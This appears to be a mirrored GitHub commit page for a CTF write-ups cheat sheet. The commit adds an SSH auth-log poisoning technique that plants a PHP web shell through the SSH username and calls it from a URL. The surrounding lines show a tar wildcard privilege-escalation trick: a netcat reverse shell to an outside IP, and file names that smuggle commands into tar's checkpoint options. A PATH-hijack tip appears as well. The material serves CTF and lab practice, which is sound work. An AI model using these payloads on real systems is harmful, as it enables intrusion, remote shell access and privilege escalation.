mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 21:03:07 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
ca2ecbef02
commit
14ef176b57
1 changed files with 9 additions and 0 deletions
|
@ -118,6 +118,14 @@ $ kill %1
|
|||
### SSH Port Forwarding
|
||||
`ssh -L <port_that_is_blockd_>:localhost:<map_blocked_port> <username>@<ip>`
|
||||
|
||||
### SSH auth log poisoning
|
||||
|
||||
Login as any user to see that it gets logged then try to login with a malicious php code
|
||||
|
||||
`ssh '<?php system($_GET['a']); ?>'@192.168.43.2`
|
||||
|
||||
Then `http://ip/page?a=whoami;`
|
||||
|
||||
### Tar Exploitation
|
||||
|
||||
When ever you see a cronjob running with a command `cd /<user>/andre/backup tar -zcf /<folder>/filetar.gz *` go to that folder from which a backup is being created and running these command in that directory <br/ >
|
||||
|
@ -126,6 +134,7 @@ echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0</tmp/lhennp | /bin/sh >/tmp/lhen
|
|||
echo "" > "--checkpoint-action=exec=sh shell.sh"
|
||||
echo "" > --checkpoint=1
|
||||
```
|
||||
|
||||
### Binary Exploits
|
||||
|
||||
If there is a certain command running in a binary example `date` so we can create our own binary and add `/bin/bash` to and path so it gets executed<br/>
|
||||
|
|
Loading…
Reference in a new issue